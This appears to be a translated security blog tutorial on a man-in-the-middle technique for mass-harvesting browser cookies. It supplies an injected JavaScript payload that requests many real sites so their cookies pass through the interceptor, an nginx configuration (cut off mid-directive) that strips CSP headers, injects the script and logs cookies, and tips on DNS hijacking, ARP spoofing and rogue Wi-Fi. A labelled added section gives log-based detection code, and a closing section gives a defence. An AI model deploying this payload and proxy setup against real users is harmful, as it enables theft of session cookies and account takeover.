MITM Attack: Cookie Eruption
0x00 Preface
Another man-in-the-middle attack technique to share, one that I have tried over and over.
This was originally an old article, but it was too long-winded, so today I restate it concisely.
0x01 Principle
Traditional cookie sniffing only captures cookies for sites the user actively visits. Sites the user never opens yield nothing, so the efficiency is very low.
If the traffic can be controlled, it is better to inject a script into the page the user is viewing. From a script you can issue a request to any site:

```javascript
new Image().src = 'http://anyhost';
```

Because the browser attaches that site's cookies to the request, the cookies of any site can be forced into the traffic and captured by the man in the middle.
0x02 Eruption
First, collect the domain names of all major websites, then request them one by one:

```javascript
var list = ['qq.com', '2017.com', 'weibo.com', /* ... */];
for (var i of list) {
    new Image().src = 'http://' + i + '/_cookies';
}
```

In this way, the cookies of many websites can be harvested at once.
The backend receives the /_cookies request, records the cookie, and returns empty content, so probing a site costs only a tiny amount of traffic.
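Seen from the network side, the fan-out described above has a recognisable shape: within a couple of seconds one client sends the same unusual path, with cookies attached, to many unrelated hosts. The following detection example is added here and is not part of the original article; it scans constructed egress-proxy log lines for that pattern, and the log format, field names and thresholds (min_hosts, window_s) are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed egress-proxy log sample (assumed format): time, client IP, Host, method, path, cookie sent?
SAMPLE_LOG = """\
2017-06-01T10:00:00 10.0.0.5 news.example GET /index.html yes
2017-06-01T10:00:02 10.0.0.5 qq.com GET /_cookies yes
2017-06-01T10:00:02 10.0.0.5 2017.com GET /_cookies yes
2017-06-01T10:00:02 10.0.0.5 weibo.com GET /_cookies yes
2017-06-01T10:00:03 10.0.0.5 shop.example GET /_cookies yes
2017-06-01T10:00:03 10.0.0.5 mail.example GET /_cookies yes
2017-06-01T10:00:09 10.0.0.7 cdn.example GET /logo.png no
2017-06-01T10:00:10 10.0.0.7 qq.com GET /favicon.ico yes
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (yes|no)$")

def parse_log(text):
    """Turn raw log lines into dicts; malformed lines are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, ip, host, _method, path, cookie = m.groups()
        records.append({"ts": datetime.fromisoformat(ts), "ip": ip,
                        "host": host, "path": path, "cookie": cookie == "yes"})
    return records

def find_fanout(records, min_hosts=4, window_s=5):
    """Return {client_ip: (path, hosts)} for clients that sent cookies to the
    same path on >= min_hosts distinct hosts within any window_s-second span."""
    by_key = defaultdict(list)
    for r in records:
        if r["cookie"]:                      # cookie-less probes leak nothing
            by_key[(r["ip"], r["path"])].append(r)
    hits = {}
    for (ip, path), rs in by_key.items():
        rs.sort(key=lambda r: r["ts"])
        best, j = set(), 0
        for i in range(len(rs)):             # sliding time window over the burst
            while (rs[i]["ts"] - rs[j]["ts"]).total_seconds() > window_s:
                j += 1
            hosts = {r["host"] for r in rs[j:i + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            hits[ip] = (path, sorted(best))
    return hits
```

Tune min_hosts and window_s against your own baseline: legitimate pages fan out to CDNs too, but rarely with an identical path and cookies on every host. On the server side, the SameSite and Secure cookie attributes keep a site's cookies off such cross-site, plain-HTTP image requests.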
0x03 Optimization
Because sites from all over are collected, a large number of domain name resolutions are required.
To make the harvesting faster, you can hijack the user's DNS requests and temporarily resolve them to your own IP address, so that the domain name queries never need to go out to the Internet.

User <-- DNS, HTTP --> Intermediary <-----> Internet

There is another huge benefit: the whole setup works offline, without relying on the Internet at all!
For example, even without Internet access you can run a Wi-Fi attack.
0x04 Demo
We use nginx to demonstrate:

```nginx
# nginx.conf
http {
    resolver 114.114.114.114;
    ...
    log_format record_cookie '$time_iso8601 $remote_addr $http_host $http_cookie';

    # static resources
    server {
        listen 8080;
        server_name m.io;
        gzip on;
        # expires 1d;
        root /path/to/;
    }

    # proxy service
    server {
        listen 8080 default_server;
        server_name _;
        gzip on;

        location / {
            # requests for html resources enter the hijacking flow
            if ($http_accept ~ "text/html") {
                rewrite ^ /_html;
            }
            # other resources are proxied normally
            proxy_pass http://$http_host;
        }

        # page injection
        location = /_html {
            internal;
            # compressed content cannot be rewritten by sub_filter; extract it first
            proxy_set_header Host $http_host;
            proxy_pass http://127.0.0.1:50000$request_uri;
            # drop the CSP header so the injected script is not blocked
            proxy_hide_header Content-Security-Policy;
            # inject the script
            sub_filter  # (the configuration is truncated here in the original)
```
In the /path/to directory, place the front-end attack script:

```javascript
// cookie.js
(function (list) {
    if (self != top) return;
    list = list.split(' ');
    for (var i = 0; i < list.length; i++) {
        new Image().src = 'http://' + list[i] + '/_cookies';
    }
})(
    // target site list
    '2017.com qq.com weibo.com'
);
```

Set the browser's HTTP proxy to 127.0.0.1:8080.
Open any HTTP page, and the user's cookies for the various sites are exposed.
There are many practical ways to control traffic: ARP spoofing, phishing Wi-Fi, phishing proxies, or hijacking a residential PPPoE network.
0x05 Prevention
In fact this is similar to the JSONP privacy leak; simply disable the browser's "third-party cookies" setting.
Third-party cookies bring no benefit and are the culprit behind privacy leaks.